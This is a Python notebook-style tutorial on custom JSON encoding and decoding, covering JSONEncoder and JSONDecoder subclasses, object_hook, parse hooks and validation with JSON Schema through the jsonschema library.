{"name":"Python","age":27,"created_by":"Guido van Rossum","list":[1,2,3]}


As you can see, all the whitespace is eliminated. For transmitting large JSON objects, that can make a (relatively small) difference in making the JSON more compact.

So, if we want to consistently use the same values for all those tweaks, we have to consistently remember to set the arguments correctly in the `dump`/`dumps` functions.

Instead, we could create a custom JSONEncoder class that pre-sets all these things, and just use that encoder - simpler than remembering all those arguments and their correct values:

In [26]:
class CustomEncoder(json.JSONEncoder):
    def __init__(self, *args, **kwargs):
        super().__init__(skipkeys=True, 
                         allow_nan=False, 
                         indent='---', 
                         separators=('', ' = ')
                        )
        
    def default(self, arg):
        if isinstance(arg, datetime):
            return arg.isoformat()
        else:
            return super().default(arg)

In [27]:
d = {
    'time': datetime.utcnow(),
    1+1j: "complex",
    'name': 'Python'
}

In [28]:
print(json.dumps(d, cls=CustomEncoder))

{
---"time" = "2018-12-29T22:27:26.689488"
---"name" = "Python"
}


Another thing I want to point out is that with both these methods we are not limited in what we emit as our JSON serialization.

For example, for a `datetime` object, we may want to emit not only the ISO formatted date, but maybe some additional fields, all nested within a JSON object:

In [29]:
class CustomEncoder(json.JSONEncoder):
    def default(self, arg):
        if isinstance(arg, datetime):
            obj = dict(
                datatype="datetime",
                iso=arg.isoformat(),
                date=arg.date().isoformat(),
                time=arg.time().isoformat(),
                year=arg.year,
                month=arg.month,
                day=arg.day,
                hour=arg.hour,
                minutes=arg.minute,
                seconds=arg.second
            )
            return obj
        else:
            return super().default(arg)

In [30]:
d = {
    'time': datetime.utcnow(),
    'message': 'Testing...'
}

In [31]:
print(json.dumps(d, cls=CustomEncoder, indent=2))

{
  "time": {
    "datatype": "datetime",
    "iso": "2018-12-29T22:27:27.668208",
    "date": "2018-12-29",
    "time": "22:27:27.668208",
    "year": 2018,
    "month": 12,
    "day": 29,
    "hour": 22,
    "minutes": 27,
    "seconds": 27
  },
  "message": "Testing..."
}


##  Custom JSON Decoding

So far we have looked at how to encode (serialize) Python objects to JSON, using the standard as well as custom object serializers.

Now we need to turn our attention to teh reverse process - deserializing (decoding) JSON data.

Once again, the standard simple types such as strings, numbers (ints and floats), arrays, and objects with key/value pairs.
JSON does not differentiate between mutable and immutable lists - so everything that is an array (`[...]`) in JSON will get decoded into a list object.

Let's see a quick example of how to do this:

In [1]:
j = '''
    {
        "name": "Python",
        "age": 27,
        "versions": ["2.x", "3.x"]
    }
'''

In [2]:
import json

In [3]:
json.loads(j)

{'name': 'Python', 'age': 27, 'versions': ['2.x', '3.x']}

But what about other data types, such as a date for example. How can we handle that?

In [4]:
p = '''
    {
        "time": "2018-10-21T09:14:00",
        "message": "created this json string"
    }
'''

In [5]:
json.loads(p)

{'time': '2018-10-21T09:14:00', 'message': 'created this json string'}

The deserialization worked just fine, but you'll notice that the dictionary entry for `time` contains a string, not a date. 

This is not a trivial problem, and many 3rd party libraries have been written to deserialize specialized JSON structures into custom Python objects. It basically boils down to having a specific structure (schema) in the JSON and manually loading up some custom (or standard) Python object by specifically looking for certain elements and objects in the JSON object. Remember that JSON only supports a few basic types, so anything beyond that is really a custom **interpretation** of the data in the JSON object.

For example, suppose we have a JSON object where any object that contains the key/value pair `"objecttype": "datetime"` is guaranteed to contain another key called `"value"` containing a date time in the format %Y-%m-%dT%H:%M:%S. 
We could easily do the following:

In [6]:
p = '''
    {
        "time": {
            "objecttype": "datetime",
            "value": "2018-10-21T09:14:15"
            },
        "message": "created this json string"
    }
'''

In [7]:
d = json.loads(p)

In [8]:
d

{'time': {'objecttype': 'datetime', 'value': '2018-10-21T09:14:15'},
 'message': 'created this json string'}

We could now run through our dictionary (top level only, we'll come back to that), and convert any datetime structures (schema) into actual datetime objects:

In [9]:
from datetime import datetime

for key, value in d.items():
    if (isinstance(value, dict) and 
        'objecttype' in value and 
        value['objecttype'] == 'datetime'):
        d[key] = datetime.strptime(value['value'], '%Y-%m-%dT%H:%M:%S')

In [10]:
d

{'time': datetime.datetime(2018, 10, 21, 9, 14, 15),
 'message': 'created this json string'}

As you can see that worked just fine.
We can do this with other "custom" JSON schemas as well.

Let's say we have a JSON schema that will encode fractions using a `fraction` type indicator and associated keys `numerator` and `denominator` with integer values, such as:

```
"pieSlice": {
    "objecttype": "fraction",
    "numerator": 1,
    "denominator": 3
    }
```

We can deal with this in the same way as before:

In [11]:
j = '''
    {
        "cake": "yummy chocolate cake",
        "myShare": {
            "objecttype": "fraction",
            "numerator": 1,
            "denominator": 8
        }
    }
'''

In [12]:
d = json.loads(j)

In [13]:
d

{'cake': 'yummy chocolate cake',
 'myShare': {'objecttype': 'fraction', 'numerator': 1, 'denominator': 8}}

In [14]:
from fractions import Fraction

for key, value in d.items():
    if (isinstance(value, dict) and
        'objecttype' in value and
        value['objecttype'] == 'fraction'):
        numerator = value['numerator']
        denominator = value['denominator']
        d[key] = Fraction(numerator, denominator)

In [15]:
d

{'cake': 'yummy chocolate cake', 'myShare': Fraction(1, 8)}

We can extend this to even custom objects as long as they follow a specific structure (schema). We could put all this code into a function, even one that can handle multiple types and clean it up quite a bit.
But...

A few things:
1. It's a real pain having to go through the dictionary after the fact and convert the objects
2. Our conversion code only considered top-level objects - what if they are nested deeper in the JSON object - we would need to deal with that possibility.

There has to be a better way!

In [16]:
def custom_decoder(arg):
    print('decoding: ', arg)
    return arg

In [17]:
j = '''
    {
        "a": 1,
        "b": 2, 
        "c": {
            "c.1": 1,
            "c.2": 2,
            "c.3": {
                "c.3.1": 1,
                "c.3.2": 2
            }
        }
    }
'''

In [18]:
d = json.loads(j, object_hook=custom_decoder)

decoding:  {'c.3.1': 1, 'c.3.2': 2}
decoding:  {'c.1': 1, 'c.2': 2, 'c.3': {'c.3.1': 1, 'c.3.2': 2}}
decoding:  {'a': 1, 'b': 2, 'c': {'c.1': 1, 'c.2': 2, 'c.3': {'c.3.1': 1, 'c.3.2': 2}}}


As you can see it called our decoder three times, the value for the key `c.3`, the value for the key `c` and the root object itself.

Now, let's write a decoder that will handle the datetime JSON we worked with earlier:

In [19]:
j = '''
    {
        "time": {
            "objecttype": "datetime",
            "value": "2018-10-21T09:14:15"
            },
        "message": "created this json string"
    }
'''

In [20]:
def custom_decoder(arg):
    if 'objecttype' in arg and arg['objecttype'] == 'datetime':
        return datetime.strptime(arg['value'], '%Y-%m-%dT%H:%M:%S')
    else:
        return arg  # important, otherwise we lose anything that's not a date!

Let's just see how it works as a plain function first:

In [21]:
custom_decoder(dict(objecttype='datetime', value='2018-10-21T09:14:15'))

datetime.datetime(2018, 10, 21, 9, 14, 15)

In [22]:
custom_decoder((dict(a=1)))

{'a': 1}

In [23]:
d = json.loads(j, object_hook=custom_decoder)

In [24]:
d

{'time': datetime.datetime(2018, 10, 21, 9, 14, 15),
 'message': 'created this json string'}

The nice thing about this approach, is our code is simpler, and this works for nested items too:

In [25]:
j = '''
    {
        "times": {
            "created": {
                "objecttype": "datetime",
                "value": "2018-10-21T09:14:15"
                },
            "updated": {
                "objecttype": "datetime",
                "value": "2018-10-22T10:00:05"
                }
            },
        "message": "log message here..."
    }
'''

In [26]:
d = json.loads(j, object_hook=custom_decoder)

In [27]:
d

{'times': {'created': datetime.datetime(2018, 10, 21, 9, 14, 15),
  'updated': datetime.datetime(2018, 10, 22, 10, 0, 5)},
 'message': 'log message here...'}

We can also extend this custom decoder to include other structures (schemas). Let's add in our fraction decoder:

In [28]:
def custom_decoder(arg):
    ret_value = arg
    if 'objecttype' in arg:
        if arg['objecttype'] == 'datetime':
            ret_value = datetime.strptime(arg['value'], '%Y-%m-%dT%H:%M:%S')
        elif arg['objecttype'] == 'fraction':
            ret_value = Fraction(arg['numerator'], arg['denominator'])
    return ret_value

In [29]:
j = '''
    {
        "cake": "yummy chocolate cake",
        "myShare": {
            "objecttype": "fraction",
            "numerator": 1,
            "denominator": 8
        },
        "eaten": {
            "at": {
                "objecttype": "datetime",
                "value": "2018-10-21T21:30:00"
                },
            "time_taken": "30 seconds"
        }
    }
'''

In [30]:
d = json.loads(j, object_hook=custom_decoder)

In [31]:
print(d)

{'cake': 'yummy chocolate cake', 'myShare': Fraction(1, 8), 'eaten': {'at': datetime.datetime(2018, 10, 21, 21, 30), 'time_taken': '30 seconds'}}


We can't really use a generic single dispatch approach we took with the encoder though - the decoder always receives a dictionary, so we can't build it that way.

We still have the issue of custom objects and classes - how do we handle those?

Well, in pretty much the same way as before - the content of the JSON has to indicate that the object is of a certain "type", and we can then decode it ourselves.

Let's see a simple example:

In [32]:
class Person:
    def __init__(self, name, ssn):
        self.name = name
        self.ssn = ssn
        
    def __repr__(self):
        return f'Person(name={self.name}, ssn={self.ssn})'

In [33]:
j = '''
    {
        "accountHolder": {
            "objecttype": "person",
            "name": "Eric Idle",
            "ssn": 100
        },
        "created": {
            "objecttype": "datetime",
            "value": "2018-10-21T03:00:00"
        }
    }
'''

In [34]:
def custom_decoder(arg):
    ret_value = arg
    if 'objecttype' in arg:
        if arg['objecttype'] == 'datetime':
            ret_value = datetime.strptime(arg['value'], '%Y-%m-%dT%H:%M:%S')
        elif arg['objecttype'] == 'fraction':
            ret_value = Fraction(arg['numerator'], arg['denominator'])
        elif arg['objecttype'] == 'person':
            ret_value = Person(arg['name'], arg['ssn'])
    return ret_value

In [35]:
d = json.loads(j, object_hook=custom_decoder)

In [36]:
d

{'accountHolder': Person(name=Eric Idle, ssn=100),
 'created': datetime.datetime(2018, 10, 21, 3, 0)}

We could also provide our custom JSON encoder in the person class to serialize that class in the way we expect when deserializing, as we saw in an earlier video:

In [37]:
class Person:
    def __init__(self, name, ssn):
        self.name = name
        self.ssn = ssn
        
    def __repr__(self):
        return f'Person(name={self.name}, ssn={self.ssn})'
    
    def toJSON(self):
        return dict(objecttype='person', name=self.name, ssn=self.ssn)

We can then encode using the techniques we have seen before, and decode using the technique we learned in this video.

There are also a few customized hooks for integers, floats and certain special strings (`-Infinity`, `Infinity` and `NaN`).

For example, we may want to encode floats using a Decimal instead of the standard float.

We could do this by using the `parse_float` argument as follows:

In [38]:
from decimal import Decimal
def make_decimal(arg):
    print('Received:', type(arg), arg)
    return Decimal(arg)

In [39]:
j = '''
    {
        "a": 100,
        "b": 0.2,
        "c": 0.5
    }
'''

In [40]:
d = json.loads(j, parse_float=make_decimal)

Received: <class 'str'> 0.2
Received: <class 'str'> 0.5


In [41]:
d

{'a': 100, 'b': Decimal('0.2'), 'c': Decimal('0.5')}

As you can see we have decimals in our dictionary, instead of floats. Note also that the argument we receive is a string - it would make little sense for us to receive a float since our function is the one that wants to specifically handle converting a JSON string to some particular type.

We can also intercept handling of integers and those constant values I mentioned.

In [42]:
j = '''
    {
        "a": 100,
        "b": Infinity
    }
'''

In [43]:
json.loads(j)

{'a': 100, 'b': inf}

In [44]:
def make_int_binary(arg):
    print('Received:', type(arg), arg)
    return bin(int(arg))

In [45]:
def make_const_none(arg):
    print('Received:', type(arg), arg)
    return None

In [46]:
json.loads(j, 
           parse_int=make_int_binary, 
           parse_constant=make_const_none)

Received: <class 'str'> 100
Received: <class 'str'> Infinity


{'a': '0b1100100', 'b': None}

Again note that in all cases, the received argument is the **string** read from the json string.

Finally we have the `object_pairs_hook` argument. It works similarly to the `object_hook` with two differences:
1. the argument is a `list` of 2-tuples - the first value is the key, the second is the value
2. the list is ordered in the same order as the keys in the json document.

Remember that the dictionary is not **guaranteed** to be ordered in the same order as the keys in the json document - given Python 3.6+ has guaranteed dictionary order, this is likely to be true, but the documents do not mention this specifically, so at this point it should be considered an implementation detail and not relied on - if you **must** have gauranteed key order, then you will have to use the `object_pairs_hook`.

Also, you should not specify both `object_hook` and `object_pairs_hook` - if you do, then the `object_pairs_hook` will be used and `object_hook` will be ignored.

In [47]:
j = '''
    {
        "a": [1, 2, 3, 4, 5],
        "b": 100,
        "c": 10.5,
        "d": NaN,
        "e": null,
        "f": "python"
    }
'''

In [48]:
def float_handler(arg):
    print('float handler', type(arg), arg)
    return float(arg)

In [49]:
def int_handler(arg):
    print('int handler', type(arg), arg)
    return int(arg)

In [50]:
def const_handler(arg):
    print('const handler', type(arg), arg)
    return None

In [51]:
def obj_hook(arg):
    print('obj hook', type(arg), arg)
    return arg

In [52]:
def obj_pairs_hook(arg):
    print('obj pairs hook', type(arg), arg)
    return arg

In [53]:
json.loads(j)

{'a': [1, 2, 3, 4, 5], 'b': 100, 'c': 10.5, 'd': nan, 'e': None, 'f': 'python'}

In [54]:
json.loads(j, 
           object_hook=obj_hook,
           parse_float=float_handler,
           parse_int=int_handler,
           parse_constant=const_handler
          )

int handler <class 'str'> 1
int handler <class 'str'> 2
int handler <class 'str'> 3
int handler <class 'str'> 4
int handler <class 'str'> 5
int handler <class 'str'> 100
float handler <class 'str'> 10.5
const handler <class 'str'> NaN
obj hook <class 'dict'> {'a': [1, 2, 3, 4, 5], 'b': 100, 'c': 10.5, 'd': None, 'e': None, 'f': 'python'}


{'a': [1, 2, 3, 4, 5],
 'b': 100,
 'c': 10.5,
 'd': None,
 'e': None,
 'f': 'python'}

In [55]:
json.loads(j, 
           object_pairs_hook=obj_pairs_hook,
           parse_float=float_handler,
           parse_int=int_handler,
           parse_constant=const_handler
          )

int handler <class 'str'> 1
int handler <class 'str'> 2
int handler <class 'str'> 3
int handler <class 'str'> 4
int handler <class 'str'> 5
int handler <class 'str'> 100
float handler <class 'str'> 10.5
const handler <class 'str'> NaN
obj pairs hook <class 'list'> [('a', [1, 2, 3, 4, 5]), ('b', 100), ('c', 10.5), ('d', None), ('e', None), ('f', 'python')]


[('a', [1, 2, 3, 4, 5]),
 ('b', 100),
 ('c', 10.5),
 ('d', None),
 ('e', None),
 ('f', 'python')]

And if we specify both object hooks, then `object_hook` is basically ignored:

In [56]:
json.loads(j, 
           object_hook=obj_hook,
           object_pairs_hook=obj_pairs_hook,
           parse_float=float_handler,
           parse_int=int_handler,
           parse_constant=const_handler
          )

int handler <class 'str'> 1
int handler <class 'str'> 2
int handler <class 'str'> 3
int handler <class 'str'> 4
int handler <class 'str'> 5
int handler <class 'str'> 100
float handler <class 'str'> 10.5
const handler <class 'str'> NaN
obj pairs hook <class 'list'> [('a', [1, 2, 3, 4, 5]), ('b', 100), ('c', 10.5), ('d', None), ('e', None), ('f', 'python')]


[('a', [1, 2, 3, 4, 5]),
 ('b', 100),
 ('c', 10.5),
 ('d', None),
 ('e', None),
 ('f', 'python')]

As we saw in the decoding videos, we can also subclass the `JSONDecoder` class (just like we subclassed the `JSONEncoder` - we'll look at this next.

##  Using JSONDecoder

Just like we can use a subclass of `JSONEncoder` to customize our json encodings, we can use a subclass of the default `JSONDecoder` class to customize decoding our json strings.

It works quite differently from the `JSONEncoder` subclassing though.

When we subclass `JSONEncoder` we override the `default` method which then allows us to intercept encoding of specific types of objects, and delegate back to the parent class what we don't want to handle specifically.

With the `JSONDecoder` class we override the `decode` function which passes us the **entire** JSON as a **string** and we have to return whatever Python object we want. There's no delegating anything back to the parent class unless we want to completely skip customizing the output.

Let's first see how the functions work:

In [1]:
import json

In [2]:
j = '''
    {
        "a": 100,
        "b": [1, 2, 3],
        "c": "python",
        "d": {
            "e": 4,
            "f": 5.5
        }
    }
'''

In [3]:
class CustomDecoder(json.JSONDecoder):
    def decode(self, arg):
        print("decode:", type(arg), arg)
        return "a simple string object"

In [4]:
json.loads(j, cls=CustomDecoder)

As you can see, whatever we return from the `decode` method is the **result** of calling `loads`.

So, we might want to intercept certain JSON strings, handling them in some custom way, and delegate back to the parent class if it's not a string we want to handle ourselves - but it's all or nothing:

Let's see an example of how we might want to use this:

In [5]:
class Point:
    def __init__(self, x, y):
        self.x = x
        self.y = y
        
    def __repr__(self):
        return f'Point(x={self.x}, y={self.y})'

In [6]:
j_points = '''
{
    "points": [
        [10, 20],
        [-1, -2],
        [0.5, 0.5]
    ]
}
'''

j_other = '''
{
    "a": 1,
    "b": 2
}
'''

In [7]:
class CustomDecoder(json.JSONDecoder):
    def decode(self, arg):
        if 'points' in arg:
            obj = json.loads(arg)
            return "parsing object for points"
        else:
            return super().decode(arg)

In [8]:
json.loads(j_points, cls=CustomDecoder)

In [9]:
json.loads(j_other, cls=CustomDecoder)

{'a': 1, 'b': 2}

So, let's implement the custom decoder now, assuming that `points` will be a top level node in the JSON object:

In [10]:
class CustomDecoder(json.JSONDecoder):
    def decode(self, arg):
        obj = json.loads(arg)
        if 'points' in obj:  # top level
            obj['points'] = [Point(x, y) 
                             for x, y in obj['points']]
        return obj

In [11]:
json.loads(j_points, cls=CustomDecoder)

{'points': [Point(x=10, y=20), Point(x=-1, y=-2), Point(x=0.5, y=0.5)]}

In [12]:
json.loads(j_other, cls=CustomDecoder)

{'a': 1, 'b': 2}

Of course, we can be more fancy and maybe handle points by specifying the data type in the JSON object (and again, this is just how **we**, the developer, decide to make that specification).

Here I am going to specify that a `Point` object in the JSON document should be specified using this format:

```
{"_type": "point", "x": x-coord, "y": y-coord}
```

So, when we parse the JSON string we are going to look for such a structure, and do the appropriate type conversion if needed. Of course, we'll have to look recursively in the JSON for this structure. We'll follow the same approach as before, first deserializing to a "generic" Python dict, then replacing any `Point` structure as we find them.

To avoid having to iterate through the deserialized JSON object when we don't have that structure there in the first place, I'm going to look for `"_type": "point"` in the **string**. Technically we also need to look for `"_type":"point"` since both, from a JSON object perspective, are the same thing.
In fact any amount of whitespace surrounding the `:` is acceptable. It would be possible but result in very unwieldy and concoluted code if we were to use an ordinary string search, so I'm going to use a regular expression instead (if you need help getting started with regular expressions, I highly recommend using this site:

https://regexr.com/

In [13]:
import re
pattern = r'"_type"\s*:\s*"point"'

In this pattern, `\s` simply means a whitespace character, and the `*` right after it means zero or more times.

Also note that we prefix that string with `r` to tell Python not to interpret the `\` as anything special - otherwise Python will try to escape that, or interpet it, when conbined with another character, as an escape sequence.

Let's see a quick example of this first:

In [14]:
print('word1\tword2')

word1	word2


In [15]:
print(r'word1\tword2')

word1\tword2


Notice the difference? Since we use the `\` character a lot in regular expressions, we should always use this `r` prefix which indicates a **raw** string, and Python will not try to recognize escape sequences in our pattern.

So, now let's continue testing out our regular expression pattern. We'll compile it so we can re-use it, but you dont have to.

Once we have it compiled, we can use the `search` method that will find the first occurrence of the pattern in our search string, or return `None` if it was not found:

In [16]:
regexp = re.compile(pattern)

In [17]:
print(regexp.search('"a": 1'))

None


In [18]:
print(regexp.search('"_type": "point"'))

<_sre.SRE_Match object; span=(0, 16), match='"_type": "point"'>


In [19]:
print(regexp.search('"_type"   : "point"'))

<_sre.SRE_Match object; span=(0, 19), match='"_type"   : "point"'>


Alternatively, if we don't want to compile it (if we only use it once, there's no real need to do so), we can do a search this way:

In [20]:
re.search(pattern, '"_type"  :  "point"')

<_sre.SRE_Match object; span=(0, 19), match='"_type"  :  "point"'>

OK, now that we have a working regular expression pattern we can implement our custom JSON decoder.

In [21]:
class CustomDecoder(json.JSONDecoder):
    def decode(self, arg):
        obj = json.loads(arg)
        pattern = r'"_type"\s*:\s*"point"'
        if re.search(pattern, arg):
            # we have at least one `Point'
            obj = self.make_pts(obj)
        return obj
    
    def make_pts(self, obj):
        # recursive function to find and replace points
        # received object could be a dictionary, a list, or a simple type
        if isinstance(obj, dict):
            # first see if this dictionary is a point itself
            if '_type' in obj and obj['_type'] == 'point':
                # could have used: if obj.get('_type', None) == 'point'
                obj = Point(obj['x'], obj['y'])
            else:
                # root object is not a point
                # but it could contain a sub-object which itself 
                # is or contains a Point object
                for key, value in obj.items():
                    obj[key] = self.make_pts(value)
        elif isinstance(obj, list):
            for index, item in enumerate(obj):
                obj[index] = self.make_pts(item)
        return obj

In [22]:
j = '''
{
    "a": 100,
    "b": 0.5,
    "rectangle": {
        "corners": {
            "b_left": {"_type": "point", "x": -1, "y": -1},
            "b_right": {"_type": "point", "x": 1, "y": -1},
            "t_left": {"_type": "point", "x": -1, "y": 1},
            "t_right": {"_type": "point", "x": 1, "y": 1}
        },
        "rotate": {"_type" : "point", "x": 0, "y": 0},
        "interior_pts": [
            {"_type": "point", "x": 0, "y": 0},
            {"_type": "point", "x": 0.5, "y": 0.5}
        ]
    }
}
'''

In [23]:
json.loads(j)

{'a': 100,
 'b': 0.5,
 'rectangle': {'corners': {'b_left': {'_type': 'point', 'x': -1, 'y': -1},
   'b_right': {'_type': 'point', 'x': 1, 'y': -1},
   't_left': {'_type': 'point', 'x': -1, 'y': 1},
   't_right': {'_type': 'point', 'x': 1, 'y': 1}},
  'rotate': {'_type': 'point', 'x': 0, 'y': 0},
  'interior_pts': [{'_type': 'point', 'x': 0, 'y': 0},
   {'_type': 'point', 'x': 0.5, 'y': 0.5}]}}

In [24]:
from pprint import pprint
pprint(json.loads(j, cls=CustomDecoder))

{'a': 100,
 'b': 0.5,
 'rectangle': {'corners': {'b_left': Point(x=-1, y=-1),
                           'b_right': Point(x=1, y=-1),
                           't_left': Point(x=-1, y=1),
                           't_right': Point(x=1, y=1)},
               'interior_pts': [Point(x=0, y=0), Point(x=0.5, y=0.5)],
               'rotate': Point(x=0, y=0)}}


The `JSONDecoder` class also has arguments such as `parse_int`, `parse_float`, etc we saw in the previous lecture.
We can use those to define a custom `JSONEncoder` class if we wanted to - let's say we want to use `Decimals` instead of floats - just like before, but instead of specifying this each and every time we calls `loads`, we can bundle this up into a custom decoder instead:

In [25]:
from decimal import Decimal
CustomDecoder = json.JSONDecoder(parse_float=Decimal)

In [26]:
d = CustomDecoder.decode(j)

In [27]:
pprint(d)

{'a': 100,
 'b': Decimal('0.5'),
 'rectangle': {'corners': {'b_left': {'_type': 'point', 'x': -1, 'y': -1},
                           'b_right': {'_type': 'point', 'x': 1, 'y': -1},
                           't_left': {'_type': 'point', 'x': -1, 'y': 1},
                           't_right': {'_type': 'point', 'x': 1, 'y': 1}},
               'interior_pts': [{'_type': 'point', 'x': 0, 'y': 0},
                                {'_type': 'point',
                                 'x': Decimal('0.5'),
                                 'y': Decimal('0.5')}],
               'rotate': {'_type': 'point', 'x': 0, 'y': 0}}}


Of course, we can combine this with our custom decoder too:

In [28]:
class CustomDecoder(json.JSONDecoder):
    base_decoder = json.JSONDecoder(parse_float=Decimal)
    
    def decode(self, arg):
        obj = self.base_decoder.decode(arg)
        pattern = r'"_type"\s*:\s*"point"'
        if re.search(pattern, arg):
            # we have at least one `Point'
            obj = self.make_pts(obj)
        return obj
    
    def make_pts(self, obj):
        # recursive function to find and replace points
        # received object could be a dictionary, a list, or a simple type
        if isinstance(obj, dict):
            # first see if this dictionary is a point itself
            if '_type' in obj and obj['_type'] == 'point':
                obj = Point(obj['x'], obj['y'])
            else:
                # root object is not a point
                # but it could contain a sub-object which itself 
                # is or contains a Point object nested at some level
                # maybe another dictionary, or a list
                for key, value in obj.items():
                    obj[key] = self.make_pts(value)
        elif isinstance(obj, list):
            # received a list - need to run each item through make_pts
            for index, item in enumerate(obj):
                obj[index] = self.make_pts(item)
        return obj

In [29]:
json.loads(j, cls=CustomDecoder)

{'a': 100,
 'b': Decimal('0.5'),
 'rectangle': {'corners': {'b_left': Point(x=-1, y=-1),
   'b_right': Point(x=1, y=-1),
   't_left': Point(x=-1, y=1),
   't_right': Point(x=1, y=1)},
  'rotate': Point(x=0, y=0),
  'interior_pts': [Point(x=0, y=0), Point(x=0.5, y=0.5)]}}

It's not evident that our `Point(x=0.5, y=0.5)` actually contains `Decimal` objects - that's really just the string representation - so let's just make sure they are indeed `Decimal` objects:

In [30]:
result = json.loads(j, cls=CustomDecoder)
pt = result['rectangle']['interior_pts'][1]
print(type(pt.x), type(pt.y))

<class 'decimal.Decimal'> <class 'decimal.Decimal'>


As you can see, decoding JSON into custom objects is not exactly easy - the basic reason being that JSON does not support anything other than simple data types such as integers, floats, strings, booleans, constants and objects and lists.

The rest is up to us.

This is one of the reasons there are quite a few 3rd party libraries that allow us to serialize and deserialize JSON objects that follow a certain schema.

I'll discuss some of those in upcoming lectures.

##  JSON Schemas

Often when we work with JSON data, the way the data is formatted is not haphazard - it often conforms to some very precise specification.

For example, REST API's will conform to some specific format for JSON input and output. 

This is called conforming to a **schema**. It is very similar to how relational databases work - we have a schema that precisely defines the columns in tables, the relationships between tables and so on.

One of the main reasons for having these schemas for JSON data is that it allows us to serialize and deserialize the data more easily - we know in advance what the JSON structure will look like, and we can therefore write code that will leverage our understanding of the JSON structure.

There are many ways in which we can define a JSON schema - it could be as simple as creating a Word document that explains how the JSON needs to be structured. Although that works, there are better, standards-based approaches though.

One of these is the JSON Schema standard:
https://json-schema.org/

We don't need Python, or any programming language, to define a schema - the schema definition is completely language-independent.

But given a JSON schema, we can now use a consistent approach to serializing and deserializing the data.

Moreover, we can also write code to serialize and deserialize specific object types - since we know exactly what to expect in the JSON string.

I am not going to cover JSON Schema in any detail here, but I will show you some simple examples of how these schemas can be defined.

Let's say we are creating an API that responds to a POST method to create some resource - let's say a Person. We want our JSON structure to look like the following:

```
{
    "firstName": "...",
    "middleInitial": "...",
    "lastName": "...",
    "age": ...
}
```

We can start with a simple schema as follows:

In [1]:
person_schema = {
    "type": "object",
    "properties": {
        "firstName": {"type": "string"},
        "middleInitial": {"type": "string"},
        "lastName": {"type": "string"},
        "age": {"type": "number"}
    }
}

The question now becomes, given a JSON string, does it conform to the schema or not?

For example, this one is OK:

In [2]:
p1 = '''
    {
        "firstName": "John",
        "middleInitial": "M",
        "lastName": "Cleese",
        "age": 79
    }
'''

How about this one is does not:

In [3]:
p2 = '''
    {
        "firstName": "John",
        "middleInitial": 100,
        "lastName": "Cleese",
        "age": "Unknown"
    }
'''

`p2` does not conform to our schema for two reasons:
1. "middleInitial" should be a string
2. "age" should be a number

How about this one?

In [4]:
p3 = '''
    {
        "firstName": "John",
        "age": -10.5
    }
'''

Actually this one **does** conform to our schema - unless we indicate a field as required, it is optional.

The `"age"` field is a number, so it also conforms to our schema. But we really would want it to be an integer, and not allow negative numbers.

Fortunately, JSON Schema does allow us to be more specific with our schema:

In [5]:
person_schema = {
    "type": "object",
    "properties": {
        "firstName": {
            "type": "string",
            "minLength": 1
        },
        "middleInitial": {
            "type": "string",
            "minLength": 1,
            "maxLength": 1
        },
        "lastName": {
            "type": "string",
            "minLength": 1
        },
        "age": {
            "type": "integer", 
            "minimum": 0
        }
    },
    "required": ["firstName", "lastName"]
}

So in this schema we require that `"firstName"` and `"lastName"` be provided, and have a minimum number of characters (`1`). We do not make `"middleInitial"` required, but if it is provided it must be one, and exactly one, character long.

The `"age"` field is not required, but if it is, it must be a non-negative integer.

The JSON Schema specification is actually quite intricate and can be used to specify schemas with great accuracy and specificity.

For example, we may have a field `"eyeColor"` which must contain (if provided) one of a few specific values: `amber`, `blue`, `brown`, `gray`, `green`, `hazel`, `red`, or `violet`.

We can do this as follows:

In [6]:
person_schema = {
    "type": "object",
    "properties": {
        "firstName": {
            "type": "string",
            "minLength": 1
        },
        "middleInitial": {
            "type": "string",
            "minLength": 1,
            "maxLength": 1
        },
        "lastName": {
            "type": "string",
            "minLength": 1
        },
        "age": {
            "type": "integer", 
            "minimum": 0
        },
        "eyeColor": {
            "type": "string",
            "enum": ["amber", "blue", "brown", "gray", 
                     "green", "hazel", "red", "violet"]
        }
    },
    "required": ["firstName", "lastName"]
}

We can now go back to our original question - determining if a given JSON string conforms to a given schema. We can easily determine if the JSON is valid (we can just do a `loads` for example), but does it conform to the JSON Schema?

We could write Python code to do this ourselves, but that would be really complicated!!

Instead, I am going to use the excellent Python library linked here: https://github.com/Julian/jsonschema

You will need to install it first (usually `pip install jsonschema` in whatever environment you are using - you are using a virtual environment of some sort, right?!!)

In [7]:
from jsonschema import validate
from jsonschema.exceptions import ValidationError
from json import loads, dumps, JSONDecodeError

We can use the `validate` function, but it will not work with a string - it needs to be deserialized into a Python dictionary first (which means it will have to be a valid JSON structure first).

In [8]:
print(p1)

try:
    validate(loads(p1), person_schema)
except JSONDecodeError as ex:
    print(f'Invalid JSON: {ex}')
except ValidationError as ex:
    print(f'Validation error: {ex}')
else:
    print('JSON is valid')


    {
        "firstName": "John",
        "middleInitial": "M",
        "lastName": "Cleese",
        "age": 79
    }

JSON is valid


In [9]:
print(p2)

try:
    validate(loads(p2), person_schema)
except JSONDecodeError as ex:
    print(f'Invalid JSON: {ex}')
except ValidationError as ex:
    print(f'Validation error: {ex}')
else:
    print('JSON is valid')


    {
        "firstName": "John",
        "middleInitial": 100,
        "lastName": "Cleese",
        "age": "Unknown"
    }

Validation error: 100 is not of type 'string'

Failed validating 'type' in schema['properties']['middleInitial']:
    {'maxLength': 1, 'minLength': 1, 'type': 'string'}

On instance['middleInitial']:
    100


In [10]:
print(p3)
try:
    validate(loads(p3), person_schema)
except JSONDecodeError as ex:
    print(f'Invalid JSON: {ex}')
except ValidationError as ex:
    print(f'Validation error: {ex}')
else:
    print('JSON is valid')


    {
        "firstName": "John",
        "age": -10.5
    }

Validation error: -10.5 is not of type 'integer'

Failed validating 'type' in schema['properties']['age']:
    {'minimum': 0, 'type': 'integer'}

On instance['age']:
    -10.5


You'll notice that the validator only returns the first validation error it encounters. This can be changed to run the entire validation and return all the validation errors (if any), but utilizes a slightly different way of performing validation:

In [11]:
from jsonschema import Draft4Validator

validator = Draft4Validator(person_schema)

In [12]:
for error in validator.iter_errors(loads(p2)):
    print(error, end='\n-----------\n')

100 is not of type 'string'

Failed validating 'type' in schema['properties']['middleInitial']:
    {'maxLength': 1, 'minLength': 1, 'type': 'string'}

On instance['middleInitial']:
    100
-----------
'Unknown' is not of type 'integer'

Failed validating 'type' in schema['properties']['age']:
    {'minimum': 0, 'type': 'integer'}

On instance['age']:
    'Unknown'
-----------


We can also test out the schema for `eyeColor`:

In [13]:
p4 = '''
    {
        "firstName": "John",
        "middleInitial": null,
        "lastName": "Cleese",
        "eyeColor": "blue-gray"
    }
'''

In [14]:
for error in validator.iter_errors(loads(p4)):
    print(error, end='\n-----------\n')    

